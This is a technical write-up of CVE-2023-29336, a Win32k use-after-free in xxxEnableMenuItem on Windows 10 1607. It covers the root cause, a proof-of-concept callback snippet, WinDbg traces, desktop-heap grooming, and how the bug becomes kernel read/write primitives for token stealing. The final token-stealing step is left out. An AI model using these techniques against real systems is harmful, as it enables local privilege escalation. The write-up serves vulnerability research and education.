Win32k that we lost. In details writeup about CVE-2023-29336
Introduction
Originally this article had been written almost two years ago and now I finally found some time to translate it and publish properly. Enjoy this story of exploiting Win32k at a time when it still didn’t have a garbage collector — and who knows, maybe by the time you’re reading this, Win32k has finally been rewritten in Rust. This exploit wouldn’t be possible without the article by NumenCyber, which provided key insights into the menu layout needed to build a reliable trigger. All expirements are made at pretty old
Windows 10 1607 build 10.0.14393.5850 amd64
.
Patchdiff
Files for patch diffing I took from WinBinIndex. The following table shows what we actually going to compare.
Filename | Hash | Version |
---|---|---|
win32kfull.sys | 827B4223666871A7FE7274F97EECB74AFB380E41 | Win10-1607-x8664 (April 2023) |
win32kbase.sys | 8FFEF7F7E2BFB01619E58CD52486283316AA3E7A | Win10-1607-x8664 (April 2023) |
win32k.sys | 23F88CD6E2541CB54D77809B840F41532E3277B3 | Win10-1607-x8664 (April 2023) |
win32kfull.sys | DF3D021A84B13A74182C993E982E27B16C38F9C1 | Win10-1607-x8664 (May 2023) |
Result of comparasion provided by BinDiff for win32kfull is quite clear. Only one function had been changed.
Root Cause Analysis
Vulnerable function is xxxEnableMenuItem
. Inside that function there is a callback which issued without taking a reference to an object of type tagMENU
returned by MenuItemState
function. That allows an attacker reach an Use-After-Free condition.
But before we dive into deep technical stuff let’s discuss the callbacks problem in general. Callback functions are a common programming pattern that allow extensibility by letting user-defined functions execute at specific extension points in a general algorithm (or main logic). It’s specific functions that is kind of injected by user into extension points of main logic where some useful user stuff can be implemented. However, this pattern introduces challenges, especially around trust and ownership of shared resources — both before the callback is invoked and after control returns to the main execution flow. These challenges become even more complex when callbacks cross trust boundaries — such as transitions between kernel and user mode, or across a network.
There are several ways to mitigate these risks: creating a separate copy of the state to pass into the callback (and avoiding reuse in the main logic), using reference counting, resource locking, and more. Each method has its trade-offs in terms of complexity, performance, and safety.
In this case the tagMENU
type supports reference counting. Reference counting is a mechanism that prevents an object instance from being released while it is still in use — as long as some code holds a reference to it. The idea is simple: whenever code begins any work with protected object it must increment reference counter; when it is done, it decrements it. The crucial point is that the reference count must stay consistent throughout the object’s entire lifecycle. If the counter gets out of sync, reference counting provides no protection at all.
The main drawback is obvious: if a programmer forgets to increment the reference counter before using the object, then — from the system’s perspective — that code never actually used the object.
When callbacks are involved, this opens up a dangerous scenario. For example, the callback can release the object, then fill the freed memory with a completely unrelated object — all before the original function resumes execution. When the flow returns to the main logic and touches the original pointer again… 💥
That’s a Use-After-Free textbook.
Now you might ask: where is the callback in xxxEnableMenuItem
. Right before the spot where the reference counter increment was added. See it now? If not, no worries — I have prepared a quick clarification.
Internally, Microsoft uses specific naming prefixes for their functions, and these often carry special meaning. Most of the time, the prefix reflects the subsystem the function belongs to. But there are other conventions too. One particularly important prefix is xxx, which typically indicates that somewhere inside that function, there is a callback into user mode.
So yes — there is a callback happening inside xxxEnableMenuItem
, and the absence of a proper reference count before it is the core of this bug.
That wraps up the root cause of the vulnerability. Now, let’s move on to the exploitation process.
Trigger
First, let’s figure out what the tagMENU
structure is and what the MenuItemState
function does. And after find out how to reach the usermode and setup everything to vullnerability trigger.
What is tagMENU?
tagMENU
is an internal structure used by Windows to implement Menu UI. Unfortunately, its memory layout is not officially documented. However, we can find clues from resources like ReactOS and the leaked source code of Windows XP.
After reverse-engineering the actual layout of tagMENU
on Windows 10.0.14393.5850 amd64
, here’s what it looks like:
struct MyTagMenu_Win10x64_98h
{
MyHead_win10x64 head; // 00000000
MyProcDeskHead deskhead; // 0000000C
__int32 fFlags; // 00000028
__int8 gap1[4]; // 0000002C
__int32 cAllocated; // 00000030
__int32 cItems; // 00000034
__int32 cxMenu; // 00000038
__int32 cyMenu; // 0000003C
__int8 gap2[8]; // 00000040
MyTagWnd_win10x64_168h *wnd; // 00000048
MyTagItem_Win10x64_98h *rgItems; // 00000050
__int64 pParentMenusList; // 00000058
__int32 dwContextHelpID; // 00000060
__int32 field_64; // 00000064
__int64 dwMenuData; // 00000068
__int8 gap3[20]; // 00000070
__int64 field_84; // 00000084
__int64 field_8C; // 0000008C
__int32 field_94; // 00000094
};
What does MenuItemState do?
The MenuItemState
function is responsible for locating a specific menu item, typically by its uID. Internally, it uses a recursive helper function called MNLookupItem
, which performs the actual lookup.
Here’s a snippet of the MNLookupItem
implementation:
Reaching the UserMode
As mentioned earlier, xxxRedrawTitle
contains callback to usermode. But to reach that point, several checks in xxxEnableMenuItem
must first be satisfied.
The first check is that the menu (passed as the first argument to MenuItemState
) must be a system menu. A system menu is retrieved via the API GetSystemMenu.
The second check is whether the menu item identifier which is returned in v15 variable matches one of the system-reserved IDs. These identifiers are typically occupied by default entries in the system menu (like “Restore”, “Move”, “Size”, etc.).
Here’s the trick: there’s no restriction on deleting default menu items. That means we can remove a default menu item and insert our own custom-controlled menu item, placing it wherever we want in the menu tree.
Now, gathering all prerequisites, we should create the following menu layout:
Why is MenuA the UAF target?
You might be asking: Why is MenuA chosen as the Use-After-Free target?
Let’s look back at the patched code and the implementation of MNLookupItem
. The v15
variable holds a pointer to the submenu that contains the menu item with a reserved system ID. That’s why MenuA is the one — it’s the submenu directly referenced by v15
.
And here’s the key issue:
MenuA doesn’t have its reference count incremented before the callback is invoked.
Usermode Callback in xxxRedrawTitle
Now let’s look at xxxRedrawTitle
. There are three different code paths in this function that allow execution to cross into user mode:
- Going down the rabbit hole through
xxxDrawCaptionBar
xxxCallHook
which invokes user-mode hooks. That hooks are set through API SetWindowsHookExAxxSendMessage
which is the simplest and most direct path — and the one I used.
To receive the WM_NCUAHDRAWCAPTION
message, we need to create a custom WndProc for the window that owns the menu targeted for UAF. That message will be dispatched to the window procedure during the redraw, allowing us to execute code in the callback — and destroy the menu at exactly the right moment.
The code that releases the menu can be seen in the snippet below:
LRESULT CALLBACK wndproc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
switch(msg) {
case WM_NCUAHDRAWCAPTION: {
wprintf(L"[?] wndproc: msg=WM_NCUAHDRAWCAPTION wParam=%x lParam=%x\n", wParam, lParam);
for (int i = GetMenuItemCount(g_hMenu_Top) - 1; i >= 0; i--) {
RemoveMenu(g_hMenu_Top, i, MF_BYPOSITION);
}
wprintf(L"[+] 5. Destroy Menu\n");
system("pause");
DestroyMenu(g_hPopupMenu_A); // Here MenuA will be freed
...
break;
}
}
return DefWindowProc(hWnd, msg, wParam, lParam);
}
Debugging
Our debugging target is the My PoC of Exploit available on GitHub.
Let’s start by finding the address of the PoC process and switching context into it:
kd> !process 0 0 poc.exe
PROCESS ffffcc0e6b8f6800 <--> EPROCESS
SessionId: 1 Cid: 0c30 Peb: 5858bd5000 ParentCid: 014c
DirBase: 2cf00000 ObjectTable: ffff94044295ad80 HandleCount: <Data Not Accessible>
Image: poc.exe
kd> .process /i /r ffffcc0e6b8f6800
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g
Because Win32k is not mapped into the system process, we need to run the commands above to switch into the correct session context. Win32k is only mapped into processes that deal with GUI. More details about what’s mapped inside system process can be found in this classic Microsoft article.
Once context is switched, it’s a good idea to reload symbols:
kd> .reload
Set a breakpoint on win32kfull!xxxEnableMenuItem
and continue execution:
kd> bp /p ffffc70664bac680 win32kfull!xxxEnableMenuItem
kd> g
Once the breakpoint hits, step through until you reach the call to win32kfull!MenuItemState
function. The last argument will contain a pointer to the MenuA instance — the target of our UAF.
kd> p
rax=ffffa0817b949ab0 rbx=fffffa8ac064c6b0 rcx=fffffa8ac064c6b0
rdx=000000000000f010 rsi=0000000000000002 rdi=000000000000f010
rip=fffffac7010196ae rsp=ffffa0817b949a50 rbp=ffffa0817b949b80
r8=0000000000000002 r9=0000000000000003 r10=fffffa8ac1b5b870
r11=ffffa0817b949aa8 r12=00000000000204b6 r13=00000000000104ab
r14=0000000000000020 r15=fffffa8ac0629770
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
win32kfull!xxxEnableMenuItem+0x2a:
fffffac7`010196ae e801010000 call win32kfull!MenuItemState (fffffac7`010197b4)
kd> ? poi(r11-0x38)
Evaluate expression: -104996992148816 = ffffa081`7b949ab0
kd> dq ffffde00877b0ab0 L1
ffffde00`877b0ab0 00000000`000104af <---> Uninitialized value
kd> p
rax=0000000000000000 rbx=ffffd7d74062a5f0 rcx=0000000000000002
rdx=000000000000f010 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac796b3 rsp=ffffde00877b0a50 rbp=ffffde00877b0b80
r8=0000000000000000 r9=ffffde00877b0ab0 r10=ffffd7d74062e890
r11=0000000000000003 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
win32kfull!xxxEnableMenuItem+0x2f:
ffffd7aa`3ac796b3 f7432800010000 test dword ptr [rbx+28h],100h ds:002b:ffffd7d7`4062a618=04000101
kd> dq ffffde00877b0ab0 L1
ffffde00`877b0ab0 ffffd7d7`4062cfe0
kd> db ffffd7d7`4062cfe0
\/
ffffd7d7`4062cfe0 73 00 03 00 00 00 00 00-01 00 00 00 00 00 00 00 s...............
ffffd7d7`4062cff0 00 00 00 00 00 00 00 00-70 1d 45 64 06 c7 ff ff ........p.Ed....
ffffd7d7`4062d000 e0 cf 62 40 d7 d7 ff ff-01 00 00 00 00 00 00 00 ..b@............
ffffd7d7`4062d010 08 00 00 00 02 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d030 00 e8 62 40 d7 d7 ff ff-50 2d 60 40 d7 d7 ff ff ..b@....P-`@....
ffffd7d7`4062d040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
In the memory dump above, we can see the reference counter associated with the MenuA object. It’s stored at offset +0x08 from the beginning of the object. The value is currently 1, and we know this value won’t be incremented — meaning the object is vulnerable to being freed while still in use.
Continue stepping until we reach the call to win32kfull!xxxRedrawTitle
function. The PoC has already set up all the required conditions — nothing too tricky, just basic Windows API usage.
kd> p
rax=ffffa0817b949a80 rbx=fffffa8ac064c6b0 rcx=fffffa8ac064c4a0
rdx=0000000000001000 rsi=0000000000000002 rdi=000000000000f010
rip=fffffac701019758 rsp=ffffa0817b949a50 rbp=0000000000000000
r8=0000000000000000 r9=ffffa0817b949ab0 r10=fffffa8ac06299a0
r11=0000000000000003 r12=00000000000204b6 r13=00000000000104ab
r14=0000000000000020 r15=fffffa8ac0629770
iopl=0 nv up ei pl nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000206
win32kfull!xxxEnableMenuItem+0xd4:
fffffac7`01019758 e853e30000 call win32kfull!xxxRedrawTitle (fffffac7`01027ab0)
Set a hardware breakpoint right after the call, and another one at win32kfull!DestroyMenu
, where the MenuA will be freed:
kd> ba e 1 ffffd7aa`3ac7975d
kd> bp /p ffffc70664bac680 win32kfull!DestroyMenu
kd> g
Once the callback hits and attempts to release the menu, win32kfull!DestroyMenu
will trigger breakpoint.
kd> g
Breakpoint 2 hit
rax=0000000000000001 rbx=0000000000000000 rcx=ffffd7d74062cfe0
rdx=0000000000000001 rsi=0000000000000000 rdi=0000000000000020
rip=ffffd7aa3ac96d20 rsp=ffffde008616de08 rbp=ffffde008616dec0
r8=0000000000000002 r9=0000000000000040 r10=ffffd7d743d997c0
r11=ffffd7d743d997c0 r12=00000000000204d0 r13=00000000000000ae
r14=00000000000204d0 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000246
win32kfull!DestroyMenu:
ffffd7aa`3ac96d20 48895c2410 mov qword ptr [rsp+10h],rbx ss:0018:ffffde00`8616de18=0000000000000000
Step through until you reach win32kbase!HMFreeObject
, where RCX
still points to MenuA.
rax=0000000000000000 rbx=ffffd7d74062cfe0 rcx=ffffd7d74062cfe0 <------- MenuA
rdx=0000000000000000 rsi=ffffd7d74062e920 rdi=0000000000000000
rip=ffffd7aa3aa3ee20 rsp=ffffde008616ddd8 rbp=ffffde008616dec0
r8=0000000000000080 r9=0000000000000001 r10=0000000000000003
r11=0000000000000001 r12=00000000000204d0 r13=00000000000000ae
r14=00000000000204d0 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
win32kbase!HMFreeObject:
ffffd7aa`3aa3ee20 48895c2410 mov qword ptr [rsp+10h],rbx ss:0018:ffffde00`8616dde8=ffffd7d74062e920
A bit further in, you’ll hit nt!RtlFreeHeap
, which actually frees the memory. R8
holds the base address of the freed memory block:
rax=ffffd7d743d99701 rbx=ffffd7d740400ac8 rcx=ffffd7d740600000
rdx=0000000000000000 rsi=0000000000000000 rdi=ffffd7d74062cfe0
rip=ffffd7aa3aa3ef82 rsp=ffffde008616dda0 rbp=ffffde008616de12
r8=ffffd7d74062cfe0 r9=0000000000000001 r10=0000000000000003
r11=0000000000000001 r12=00000000000204d0 r13=00000000000000ae
r14=0000000000000001 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000246
win32kbase!HMFreeObject+0x162:
ffffd7aa`3aa3ef82 ff1500820f00 call qword ptr [win32kbase!_imp_RtlFreeHeap (ffffd7aa`3ab37188)] ds:002b:ffffd7aa`3ab37188={nt!RtlFreeHeap (fffff803`4683bfd4)}
Now continue execution until the post-callback hardware breakpoint hits — we’re back inside win32kfull!xxxEnableMenuItem
, but MenuA is already freed.
kd> g
Breakpoint 1 hit
rax=0000000000000001 rbx=ffffd7d74062a5f0 rcx=ffffd7d74062a3e0
rdx=ffffd7d740600820 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac7975d rsp=ffffde00877b0a50 rbp=0000000000000000
r8=ffffd7d740600700 r9=ffffc70664451d70 r10=000000032ca29f71
r11=ffffde00877b0640 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
win32kfull!xxxEnableMenuItem+0xd9:
ffffd7aa`3ac7975d 81ff60f00000 cmp edi,0F060h
After the previously set breakpoint is hit, let’s continue stepping through the code until we reach the call to win32kfull!MNGetPopupFromMenu
function.
kd> p
rax=ffffd7d74062a3e0 rbx=ffffd7d74062a5f0 rcx=ffffd7d74062cfe0
rdx=0000000000000000 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac796ca rsp=ffffde00877b0a50 rbp=0000000000000000
r8=ffffd7d740600700 r9=ffffc70664451d70 r10=000000032ca29f71
r11=ffffde00877b0640 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000246
win32kfull!xxxEnableMenuItem+0x46:
ffffd7aa`3ac796ca e835e20100 call win32kfull!MNGetPopupFromMenu (ffffd7aa`3ac97904)
The RCX
register contains the same pointer we observed earlier, right after the call to win32kfull!MenuItemState
. Let’s dump the contents of that object again — this time, we’ll see that the memory has changed.
kd> db ffffd7d74062cfe0
ffffd7d7`4062cfe0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
ffffd7d7`4062cff0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
ffffd7d7`4062d000 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
ffffd7d7`4062d010 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
ffffd7d7`4062d020 41 41 41 41 41 41 40 30-30 30 30 00 00 00 00 00 AAAAAA@0000.....
ffffd7d7`4062d030 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
So how did that happen? Our callback didn’t just release the memory — it reclaimed it with controlled data.
Let’s dive into the next question: How do we replace a freed kernel object in memory with controlled data?
Exploit
Heap feng shui
Before diving into the heap feng shui used in this exploit, let’s first revisit some core concepts at a high level.
In Win32k, most GUI-related objects are associated with a specific Desktop These objects are allocated from a Desktop Heap, which is created during desktop initialization. This heap is managed by nt implementation (RtlpAllocateHeap
/RtlpFreeHeap
). We can roughly imagine the desktop heap as a sorted (asc order) list of free memory chunks. Each chunk is a fixed-size virtual memory block. When an allocation is made, a chunk is taken from the list; when it’s freed, the chunk is returned to the list. Key Details of the Allocator:
RtlpAllocateHeap
- Aligns the requested size to a 16-byte boundary
- Searches for the first chunk in the free list that is large enough
- If the found chunk is larger than needed, it’s split into two. The left part is returned to the caller. The right part is reinserted into the free list
RtlpFreeHeap
- Marks the chunk as freed
- If adjacent chunks (left/right) are also free, they may be coalesced into a single larger chunk
From this behavior, a simple conclusion emerges: Subsequent allocations and deallocations of the same size will almost always reuse the same memory chunk.
This reuse behavior is critical to reliably reclaiming freed objects — and forms the basis of our exploitation strategy.
Obviously, this is an oversimplification. There are many allocator behaviors that may matter in other cases — like LFH (Low Fragmentation Heap), chunk header encoding, randomized selection, etc. But for clarity, I’ve intentionally kept this section simple as much as possible
Before we can act, we need a plan:
- Prepare the Desktop Heap, specifically the list of free chunks.We want this list to start with chunks located at controlled or predictable addresses, and with sizes as close as possible to the size of the target object. We’ll refer to these candidate chunks as “seats”.
- Allocate the target object in one of those prepared seats. Roughly speaking, we want to “seat” the object into the right place.
- Free the target object, creating a hole at a known location.
- Reallocate all “seats” with controlled objects to replace the freed object.
Now we have a plan and we are ready to discuss each step in detail.
Heap preparation usually consists of two steps: Heap Normalization and Freeing Selected Chunks.
- Allocate a large number of memory chunks to normalize the heap layout. The goal is to make subsequent allocations more predictable — or even strictly sequential.
- Allocate another batch of chunks and selectively free some of them using appropriate APIs. Most of the time, we want to avoid freeing adjacent chunks to prevent coalescing. We’re aiming to create isolated free chunks — “the seats” — that will later be used to reclaim the target object.
Before we can prepare any seats, we obviously need to allocate something first. But to do that, we need to answer an important question: What size should our seats be?
Because the heap allocator (RtlpAllocateHeap
) selects the smallest free chunk that fits the aligned allocation size. So the closer our seat size is to the size of the target object, the higher the chance that chunk will be reused during reallocation. The ideal case, of course, is when the seat size is exactly equal to the aligned size of the target object.
Here it is good spot to compute actuall size of tagMENU
chunk. Size of struct if 0x98 but RtlpAllocateHeap
will align it to 0xA0.
Just as a refresher, here’s the typical alignment formula: (size_t)((~(n - 1)) & ((x) + (n - 1)))
Since there’s no direct way to allocate arbitrary chunks in the Desktop Heap, we need to use APIs that internally allocate Win32k objects on that heap. Our goal is to either: Use an object whose size we can control, or choose an object whose size closely matches the size of the target (tagMENU
). Fortunately, Win32k (along with usermode Win32 APIs) offers plenty of options. Many exposed APIs lead to object creation in the Desktop Heap
CreateWindow
→ allocates atagWND
CreateMenu
→ allocates atagMENU
CreateAcceleratorTable
→ allocates atagACCELTABLE
- …
To make holes for the target tagMENU
object, we’ll use an object allocated by the RegisterClassExW
API — which creates a tagCLS
structure.
This object is especially useful because we can control its size. By carefully adjusting fields in the WNDCLASSEXW
structure — particularly cbClsExtra
— we can fine-tune the layout of the resulting tagCLS
object, making it a perfect fit for the freed chunk of tagMENU
.
On the tested version of Windows (10.0.14393.5850
), the size of a tagCLS
object with cbClsExtra == 0
is A0h
, which alomst perfectly matches the size of the tagMENU
structure.
However, there’s an important detail about how tagCLS
objects are created:
Every tagCLS
must have a name, specified in the lpszClassName
field of the WNDCLASSEXW
structure — and that name must be unique.
This name string is also allocated in the same Desktop Heap. As a result, the tagCLS
and its name may be allocated in adjacent chunks. When the tagCLS
is freed, its associated name is also freed, and the allocator coalesces the two chunks into one larger free block.
This can be a problem: the resulting free chunk might no longer be A0h
or B0h
, but something larger like D0h
or more.
That breaks our assumption that the seat will perfectly match the target object’s size — and even small gaps can ruin the exploit.
💥 In practice, this behavior caused occasionally crashes during exploitation.
Fortunately, spraying a large number of allocations helps mitigate the issue by saturating the heap and improving the odds of perfect fits. But it doesn’t eliminate the problem completely.
On the picture below you can see corresponded situation but from freelist point of view.
Now is a good time to highlight the code that actually allocates objects and creates the holes.
This part of the exploit relies on the assumption that the Desktop Heap has already been normalized, meaning that new allocations will be placed into adjacent chunks within the Desktop Heap. That gives us the predictability we need to ensure our freed object — the hole — is exactly where we want it.
Let’s move on to the next major step. How to fill the freed hole with a new tagMENU object. Strictly speaking, this part isn’t very difficult. Once again, we’ll rely on Win32k APIs — in this case, we’ll use the CreatePopupMenu
function.
But as with the tagCLS
case, there’s a subtle detail worth pointing out.
A tagMENU
object may contain menu items, and memory for those items must be allocated. As you might guess, this memory is allocated on the same Desktop Heap as the tagMENU
itself.
On the picture below, you can see how item allocation happens internally:
In the picture below, you can see the memory layout after CreatePopupMenu
— specifically, where the menu items are allocated:
Because the holes we created earlier were isolated from surrounding chunks, the tagMENU
object itself will be allocated directly into one of those holes. However, the memory for the menu items (rgItems) will be allocated elsewhere — likely in a different free chunk on the Desktop Heap.
This separation is important. It means the menu object lands where we want (replacing the freed target), while its internal data structures won’t intersect with neighboring memory — preserving the integrity of the surrounding heap and improving exploit reliability.
After the trigger (which we’ve already discussed), the vulnerable tagMENU
object gets freed. Now it’s time to reclaim that freed memory with something else — something fully under our control.
But what kind of object should we use to replace tagMENU
?
We’ll go back to using a familiar structure: tagCLS
.
However, this time we won’t use the tagCLS
structure itself — instead, we’ll target the class name field, lpszAnsiClassName
.
As mentioned earlier, this string is allocated on the same Desktop Heap, and unlike the structure itself, we can control every byte at any offset. That makes it a perfect candidate for crafting a fake object layout.
Let’s summarize everything about the replacement strategy.
To reclaim the freed tagMENU
chunk, we need to create a string of exactly 98h
bytes, matching the size of the tagMENU
.
This string must also be unique to satisfy the Win32k requirement that each tagCLS
name be unique.
We then use that string as the lpszAnsiClassName
field when registering a new tagCLS
via RegisterClassExW
.
There’s one more subtlety here:
Because the tagCLS
structure itself is very similar in size to tagMENU
, we need to ensure that it doesn’t accidentally land in the freed chunk. So to avoid conflicts and ensure the name string lands there instead, we increase the size of the tagCLS
using the cbClsExtra
field of the WNDCLASSEX
structure.
In the image below, you can see the result — all previously holes and freed tagMENU
have been successfully reclaimed with controlled lpszAnsiClassName
strings from different tagCLS
instances:
In the image below, you can see the code responsible for reclaiming the freed tagMENU
chunk with our controlled data.
And here’s the result.
The memory dump below shows the reclaimed object sitting exactly where tagMENU
was previously located.
You might recognize this from the debugging section near the beginning of the write-up — it’s the similar overwritten memory dump we saw after the user-mode callback triggered the free:
That wraps up everything related to heap feng shui and precise memory layout control.
R/W
The final goal of this exploit is to elevate privileges. There are several ways to achieve this, but in this write-up, we’ll use one of the classic techniques: Token Stealing. In simple terms, we want to replace the _TOKEN
in the _EPROCESS
structure of our current process with the System process (PID 4). This results in our process inheriting the full privileges of the System process.
Notice the semantic of the operation: it’s a replacement.
And replacement can be decomposed into two fundamental operations:
- Read: read the
_TOKEN
pointer from the System_EPROCESS
- Write: write that pointer into our own process’s
_EPROCESS
structure
In this section, we will construct the read and write primitives — the fundamental building blocks of our exploit.
Trick the system
To achieve write capabilities, we’ll once again rely on familiar Win32k objects: tagCLS
and tagWND
.
The tagCLS
structure contains a particularly interesting field called cbClsExtra
. This field defines how many extra bytes are reserved after the tagCLS
object in memory. This extra space is intended to allow third-party applications to store custom data.
Windows exposes two APIs for accessing this area:
These functions allow user-mode applications to read from and write to the memory immediately following the tagCLS
object — based on the value of cbClsExtra
.
If we manage to manipulate cbClsExtra
, we can trick the system into thinking there’s a large amount of extra memory after the object. From there, it’s straightforward to use SetClassLongPtr
to perform out-of-bounds
writes well beyond the original object boundary — giving us a powerful and flexible write primitive.
So how do we actually trigger the use of the freed object?
We use the vulnerable code as designed: after the execution flow returns from user-mode (where the object was freed and replaced), the kernel continues using the original pointer — now pointing to a fully controlled fake object.
This is the last crucial piece of the puzzle.
At the end of xxxEnableMenuItem
, the (now stale) object is passed as an argument to the MNGetPopupFromMenu
function. This function performs a search for a corresponding tagPOPUPMENU
structure by walking two linked lists stored in the tagMENUSTATE
(tagMENUSTATE
is stored in UserThreadInfo
. UserThreadInfo
is reachable through the tagWND
that is the parent of the target tagMENU
). If the search succeeds, the function returns a pointer to a tagPOPUPMENU
instance.
After returning from MNGetPopupFromMenu
, the object it returns is passed back to xxxEnableMenuItem
, and from there it is forwarded as the first argument to the function xxxMNUpdateShownMenu
.
Inside xxxMNUpdateShownMenu
, only two fields of the returned object are accessed:
spwndPopupMenu
spmenu
Both are read-only at this stage. The spwndPopupMenu
field is passed down to xxxScrollWindowEx
and xxxInvalidateRect
.
xxxScrollWindowEx
doesn’t modify anything in spwndPopupMenu
, and it eventually reaches the same sink as xxxInvalidateRect
: a call to xxxRedrawWindow
.
And now comes the crucial part.
Inside xxxRedrawWindow
, the spwndPopupMenu
object is used on write. A bitwise OR operation with the constant 02h
is performed at offset +0x120
into the structure.
Here is the relevant disassembly:
And the corresponding pseudocode:
This gives us exactly what we need.
By crafting the fake object such that the spwndPopupMenu
field points to the cbClsExtra
field in our target tagCLS
structure, we can cause the system to OR that value with 02h
. The result cbClsExtra
becomes larger than it originally was.
And that gives us what we want — the ability to use SetClassLongPtr
to write well beyond the original bounds of the tagCLS
structure, turning it into a write primitive. It’s not yet a fully arbitrary write — but we’ll address that in the next step.
To set the field_120 pointer (used in the write operation) to point to the cbClsExtra
field in our fake tagCLS
object, we first need to know its kernel address. Without it, we can’t correctly position the write or extend our primitive.
To solve this, we’ll use a well-known but effective technique based on the internal Win32k function HMValidateHandle.
Now it’s time to turn our relative write primitive into a fully arbitrary write.
To do this, we want to create a specific memory layout on the Desktop Heap:
- A
tagCLS
object (we’ll call it the Manager) placed between two tagWND objects - The left
tagWND
becomes our LeftGuard - The right
tagWND
becomes our RightGuard
In order to achieve that we will do the follwing things.
Create a
tagCLS
that we’ll use to createtagWND
objects. We’ll refer to this class asGuardClass
.Allocate 256
tagWND
objects usingCreateWindowEx
and theGuardClass
. These windows will populate the heap and help us find sequential placements.Find three
tagWND
objects that are allocated sequentially in memory. To verify whether they occupy adjacent memory chunks, we use the HMValidateHandle technique. This allows us to leak the kernel addresses of thetagWND
instances and check if they are placed contiguously in the Desktop Heap.- The first will become the LeftGuard
- The third will become the RightGuard
- The second one is freed using DestroyWindow — creating a hole
Create a new
tagCLS
, with a size equal to that of the previously releasedtagWND
. This new class will be allocated into the hole, and becomes our Manager.Release all unused
tagWND
windows from step 2, keeping only the LeftGuard and RightGuard.Create a new
tagWND
using the class associated with the Manager. This new window gives us a handle we can use withSetClassLongPtr
, tied to thetagCLS
in the middle. We’ll refer to this final window as WND Manager.
The tagWND
size must be greater than 90h
bytes (it may be achieved via cbwndExtra
field of GuardClass). This is critical because we will later use this region to bypass some internal checks in Win32k when finalizing the write primitive.
Offset that we should pass to spwndPopupMenu
is VA-of-Manager + 63h - 120h
60h
because this is offset ofcbClsExtra
03h
because we want to modify the highest rank of stored dword120h
because it is offset tofield_120
Now it’s time to prepare the fake object that will allow us to overwrite the cbWndExtra field in our Manager.
The memory once occupied by the original tagMENU
is now replaced with controlled data.
We control this memory via the lpszAnsiClassName
field of a tagCLS
, as explained in the Heap Feng Shui
section.
Now we are ready to move on and make final primitives.
Arbitary Read
We’ll start by implementing the read primitive, since it will be used later in our arbitrary write.
This primitive leverages the GetMenuBarInfo
API in combination with our RightGuard window. When called with OBJID_MENU
(value -3), GetMenuBarInfo
retrieves information about the menu attached to a window (specifically a tagWND).
Internally, GetMenuBarInfo
is backed by xxxGetMenuBarInfo
and it reads from the rgItems
field of the associated tagMENU
object. The pointer to this tagMENU
comes from the spmenu
field inside tagWND
.
Because we already have a relative read/write via our Manager, we can modify the spmenu field in RightGuard to point to a fake tagMENU
structure under our control. This allows us to trick GetMenuBarInfo
into reading from an arbitrary address.
The implementation of this technique is shown in the image below.
Arbitary Write
To implement the arbitrary write, we use the same relative read/write primitive from the Manager to modify the pcls
pointer in RightGuard, pointing it to a fake tagCLS
under our control.
We then call SetClassLongPtr
on RightGuard, which operates on this fake structure. Internally, Win32k uses the pclsClone
field of tagCLS
to compute the destination address.
As seen in the pseudocode, the final write target should be VA-of-WriteTarget - A0h
. A0h
is the offset of _extra
field. The write occurs in a loop, and the field at offset 00h
(the next pointer) must be zero, or the loop will continue and likely cause a crash or corrupt other memory.
To satisfy the condition in SetClassLongPtr
, we use our read primitive to check if the target address (VA-of-WriteTarget - 0xA0
) points to a zeroed memory region. If it doesn’t, we adjust our fake pclsClone
pointer backwards until we find an address that does point to zero. This avoids triggering the linked list loop inside SetClassLongPtr
.
To compensate for the new offset, we use the second parameter of SetClassLongPtr
, which acts as an index (value of index is local varaible with name offset at pseudocode above).
This index is add internally to calculate the final write offset, so it allows us to land exactly on the original target, even if the base pointer was shifted.
At the end we should not forget to recover original tagCLS pointer.
Conclusions
I hope I managed to explain the full exploitation process in a clear and structured way. If you have any questions, feel free to reach out — I’m happy to answer or discuss further.
We intentionally left out the final step — the actual token stealing implementation. It’s not very complicated, and if you’ve followed the write-up this far, consider it a practical exercise for the reader.